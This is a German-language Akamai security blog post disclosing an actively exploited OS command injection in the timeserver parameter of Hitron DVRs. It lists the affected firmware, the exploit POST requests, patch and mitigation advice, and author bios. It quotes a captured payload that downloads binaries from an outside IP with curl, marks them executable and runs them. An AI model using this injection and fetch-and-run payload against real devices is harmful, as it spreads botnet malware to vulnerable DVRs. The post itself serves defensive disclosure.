X

Sie sind an Cloud Computing interessiert? Legen Sie jetzt los

Akamai logo
+1-8774252624
+1-8774252624
Anmelden
Control Center
Zugriff auf die Akamai Plattform
Cloud Manager
Verwaltung Ihrer Cloudressourcen
Akamai testen
Support bei Angriffen
Anmelden
Control Center
Zugriff auf die Akamai Plattform
Cloud Manager
Verwaltung Ihrer Cloudressourcen

Aktiv ausgenutzte Schwachstelle in DVRs von Hitron: Behoben, Patches verfügbar

Akamai Wave Blue

Verfasser

Aline Eliovich, Kyle Lefton, Chad Seaman, und Larry Cashdollar

January 30, 2024

Aline Eliovich

Verfasser

Aline Eliovich

Aline Eliovich verfügt über sechs Jahre Erfahrung im Sicherheitssektor. Derzeit arbeitet sie als Forscherin im Security Intelligence Response Team von Akamai. Sie hat am Holon Technology Institute Informatik studiert. Aline verwendet für ihre Forschung gerne verschiedene OSINT-Methoden (Open-Source-Informationen).

Akamai Blue Wave

Verfasser

Kyle Lefton

Kyle Lefton ist Security Research Intern im Security Intelligence Response Team von Akamai. Kyle war früher als Intelligence Analyst für das US-amerikanische Verteidigungsministerium tätig und verfügt über mehrere Jahre Erfahrung in den Bereichen Cybersicherheit, Bedrohungsforschung und Spionageabwehr. Es bereitet ihm Freude, neue Bedrohungen zu untersuchen, Schwachstellen zu erforschen und Bedrohungsgruppenzuordnungen zu erstellen. Abseits der Arbeit verbringt er gern Zeit mit Freunden und Familie, Strategiespielen und Wanderungen in der freien Natur.

Chad Seaman headshot

Verfasser

Chad Seaman

Chad Seaman ist Principal Security Researcher und Leiter des Security Intelligence Response Teams von Akamai. Er bezeichnet sich stolz als „Internet Dumpster Diver“ (zu Deutsch: Internet-Mülltaucher) und genießt es, die Abgründe zu erforschen, die er dort vorfindet. Chad begann seine Karriere als Programmierer und, nachdem er im Rahmen der Angriffsuntersuchung Sicherheits-, Exploit- und Forensik-Risiken ausgesetzt war, wurde Sicherheit schnell zu seiner bevorzugten Arbeit. Er verbringt seine Zeit nun mit der Untersuchung von Malware, Reverse Engineering, Schwachstellenforschung, DDoS-Analysen und Untersuchungen von Cyberkriminalität. Er fliegt gern Flugzeuge, schießt aus der Ferne Löcher in Papier und verbringt Zeit in der Natur, vorzugsweise im Wald auf seinem Dirtbike.

Larry Cashdollar

Verfasser

Larry Cashdollar

Larry W. Cashdollar arbeitet bereits seit über 18 Jahren als Schwachstellenforscher im Bereich Sicherheit. Aktuell ist er Mitglied des Security Incident Response-Teams bei Akamai Technologies. Er studierte Computerwissenschaften an der University of Southern Maine. Cashdollar hat mehr als 150 CVEs dokumentiert und seine Forschungsergebnisse sogar bei BSides Boston, OWASP Rhode Island und Defcon vorgestellt. Er ist Outdoor-Fan und beschäftigt sich in seiner Freizeit gern mit der Neukonstruktion von Minibike-Motoren.

Im Rahmen der Entdeckung von InfectedSlurs hat das Akamai SIRT Sicherheitslücken in mehreren Hitron-DVR-Modellen festgestellt, die aktiv im freien Internet ausgenutzt werden.

Zusammenfassung

Was Sie wissen müssen

Im Rahmen der Entdeckung von InfectedSlurs hat das Akamai SIRT Sicherheitslücken in mehreren Hitron-DVR-Modellen festgestellt, die aktiv im freien Internet ausgenutzt werden. Hitron-Geräte werden in Südkorea von Hitron Systems hergestellt.

Die Sicherheitslücke ermöglicht es einem authentifizierten Angreifer, eine OS-Befehlsinjektion mit einer Payload zu erreichen, die über eine POST-Anfrage an die Verwaltungsschnittstelle gesendet wird. In seiner aktuellen Konfiguration setzt sie auf die Standardanmeldeinformationen des Geräts in den erfassten Payloads.

Die betroffenen Geräte- und Firmware-Versionen sind:

  • DVR HVR-4781: Versionen 1.03 bis 4.02

  • DVR HVR-8781: Versionen 1.03 bis 4.02

  • DVR HVR-16781: Versionen 1.03 bis 4.02

  • DVR LGUVR-4H: Versionen 1.02 bis 4.02

  • DVR LGUVR-8H: Versionen 1.02 bis 4.02

  • DVR LGUVR-16H: Versionen 1.02 bis 4.02

Der Anbieter (Hitron Systems) hat neue Firmware-Versionen veröffentlicht, um die Sicherheitslücken zu beheben. Der Anbieter schlägt vor, für alle betroffenen Modelle so bald wie möglich ein Update auf Firmware-Version ≥ 4.03 vorzunehmen. Empfehlungen dazu wurden auch von veröffentlicht von CISA und KISA. KISA hat auch Empfehlungen zu den einzelnen CVEs veröffentlicht, die unter den folgenden Links zu finden sind:

Beobachteter Exploit

Ende Oktober 2023 bemerkten die SIRT-Analysten von Akamai einen Anstieg der Aktivität unserer Honeypots, die auf einen selten ausgenutzten TCP-Port abzielten. Die Versuche waren von niedriger Frequenz und schienen zuerst eine Authentifizierung zu versuchen – und das über eine POST-Anfrage an /cgi-bin/system_ntp.cgi (Abbildung 1) gefolgt von einem Command-Injection-Exploitversuch (Abbildung 2).  Bei den betroffenen Geräten handelt es sich um DVR-Geräte von Hitron Systems, die durch Command Injection für RCE anfällig sind (Abbildung 3). Nach der Authentifizierung zielt der Angreifer auf die Command-Injection-Schwachstelle im Parameter timeserver. Dies geschieht über eine POST-Anfrage an /cgi-bin/system_ntp.cgi.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Abb. 1: Authentifizierungsversuch

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

Abb. 2: Exploit-Versuch

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Abb. 3: Erfasste RCE-Payload

Schutz

Hitron-DVR-Nutzer, die Geräte ausführen, die von dieser Sicherheitsanfälligkeit betroffen sind, sollten sofort auf die neuesten verfügbaren Firmware-Versionen (≥ 4.03) aktualisieren, mit denen die RCE-Sicherheitslücke behoben wird.  

Außerdem sollten zum Schutz vor diesen und künftigen Bedrohungen mehrere Sicherheitsmaßnahmen ergriffen werden. Erstens sollten Unternehmen und Einzelpersonen, die die betroffenen Geräte verwenden, die standardmäßigen Anmeldeinformationen sofort ändern, um die Sicherheit zu erhöhen. Durch die regelmäßige Überwachung des Netzwerktraffics und der Protokolle können verdächtige Aktivitäten frühzeitig erkannt werden. Die rechtzeitige Installation von Sicherheitspatches und -Updates vom Gerätehersteller ist entscheidend, um die erkannte Sicherheitslücke zu beheben.

Die Zusammenarbeit mit Sicherheitsforschern, Anbietern von Threat Intelligence und Branchenkollegen hilft Ihnen, über neue Bedrohungen und Schwachstellen auf dem Laufenden zu bleiben. Schließlich sollten Sie eine aktualisierte Bestandsaufnahme der angeschlossenen Geräte pflegen und die Implementierung einer Netzwerksegmentierung kann die potenziellen Auswirkungen solcher Angriffe begrenzen.

Fazit

Um die in den Hitron-Systemen und den zugehörigen Geräten identifizierten Sicherheitsprobleme zu lösen, ist ein vielseitiger Ansatz erforderlich, der Nutzerbewusstsein, sofortiges Patchen, proaktive Überwachung und Zusammenarbeit innerhalb der Cybersicherheits-Community kombiniert. Durch diese Maßnahmen können Unternehmen und Einzelpersonen die Risiken der beobachteten Schadaktivitäten erheblich reduzieren.

Wir halten Sie auf dem Laufenden

Um mit Bedrohungen und anderen Erkenntnissen des SIRT und anderer Sicherheitsforschungsgruppen von Akamai Schritt zu halten, folgen Sie uns auf X (ehemals Twitter) oder besuchen Sie unseren SIG-Hub.

Das Akamai SIRT dankt den Mitarbeitern von CISA, US-CERT und KISA für ihre Unterstützung bei der Meldung dieser Schwachstellen an die Anbieter.

Weitere Forschungsergebnisse
Akamai Wave Blue

Verfasser

Aline Eliovich, Kyle Lefton, Chad Seaman, und Larry Cashdollar

January 30, 2024

Aline Eliovich

Verfasser

Aline Eliovich

Aline Eliovich verfügt über sechs Jahre Erfahrung im Sicherheitssektor. Derzeit arbeitet sie als Forscherin im Security Intelligence Response Team von Akamai. Sie hat am Holon Technology Institute Informatik studiert. Aline verwendet für ihre Forschung gerne verschiedene OSINT-Methoden (Open-Source-Informationen).

Akamai Blue Wave

Verfasser

Kyle Lefton

Kyle Lefton ist Security Research Intern im Security Intelligence Response Team von Akamai. Kyle war früher als Intelligence Analyst für das US-amerikanische Verteidigungsministerium tätig und verfügt über mehrere Jahre Erfahrung in den Bereichen Cybersicherheit, Bedrohungsforschung und Spionageabwehr. Es bereitet ihm Freude, neue Bedrohungen zu untersuchen, Schwachstellen zu erforschen und Bedrohungsgruppenzuordnungen zu erstellen. Abseits der Arbeit verbringt er gern Zeit mit Freunden und Familie, Strategiespielen und Wanderungen in der freien Natur.

Chad Seaman headshot

Verfasser

Chad Seaman

Chad Seaman ist Principal Security Researcher und Leiter des Security Intelligence Response Teams von Akamai. Er bezeichnet sich stolz als „Internet Dumpster Diver“ (zu Deutsch: Internet-Mülltaucher) und genießt es, die Abgründe zu erforschen, die er dort vorfindet. Chad begann seine Karriere als Programmierer und, nachdem er im Rahmen der Angriffsuntersuchung Sicherheits-, Exploit- und Forensik-Risiken ausgesetzt war, wurde Sicherheit schnell zu seiner bevorzugten Arbeit. Er verbringt seine Zeit nun mit der Untersuchung von Malware, Reverse Engineering, Schwachstellenforschung, DDoS-Analysen und Untersuchungen von Cyberkriminalität. Er fliegt gern Flugzeuge, schießt aus der Ferne Löcher in Papier und verbringt Zeit in der Natur, vorzugsweise im Wald auf seinem Dirtbike.

Larry Cashdollar

Verfasser

Larry Cashdollar

Larry W. Cashdollar arbeitet bereits seit über 18 Jahren als Schwachstellenforscher im Bereich Sicherheit. Aktuell ist er Mitglied des Security Incident Response-Teams bei Akamai Technologies. Er studierte Computerwissenschaften an der University of Southern Maine. Cashdollar hat mehr als 150 CVEs dokumentiert und seine Forschungsergebnisse sogar bei BSides Boston, OWASP Rhode Island und Defcon vorgestellt. Er ist Outdoor-Fan und beschäftigt sich in seiner Freizeit gern mit der Neukonstruktion von Minibike-Motoren.

Verwandte Blogbeiträge

Akamai-Forscher Stiv Kupchik hat eine neue Schwachstelle bezüglich der Erhöhung von Berechtigungen (Elevation of Privilege – EoP) im Remote Registry-Client von Microsoft gefunden.
Akamai-Forscher Stiv Kupchik hat eine neue Schwachstelle bezüglich der Erhöhung von Berechtigungen (Elevation of Privilege – EoP) im Remote Registry-Client von Microsoft gefunden.

Aufruf und Registrierung – Relay-Angriff auf WinReg RPC-Client

October 19, 2024
Forscher von Akamai untersuchen eine neue Schwachstelle, die für EoP-Angriffe gegen Windows-Computer ausgenutzt werden kann.
von Stiv Kupchik
Weitere Informationen
Dieser Takedown ist ein großer Schritt zu mehr Sicherheit im Internet.
Dieser Takedown ist ein großer Schritt zu mehr Sicherheit im Internet.

Takedown von Anonymous Sudan: Welche Rolle Akamai gespielt hat

October 16, 2024
Das amerikanische Justizministerium hat den Takedown von Anonymous Sudan bekannt gegeben. Erfahren Sie, wie Akamai diese Bemühungen unterstützt hat.
von Akamai SIRT
Weitere Informationen
In diesem Monat gibt es insgesamt 117 CVEs in 60 verschiedenen Komponenten. Davon sind drei kritisch.
In diesem Monat gibt es insgesamt 117 CVEs in 60 verschiedenen Komponenten. Davon sind drei kritisch.

Einschätzung von Akamai zum Patch Tuesday im Oktober 2024

October 11, 2024
Es gibt viele CVEs, aber keine Angst – fürchten müssen Sie sich nur an Halloween. Diesen Monat haben wir insgesamt 117 CVEs und zwei im freien Internet ausgenutzte Schwachstellen.
von Akamai Security Intelligence Group
Weitere Informationen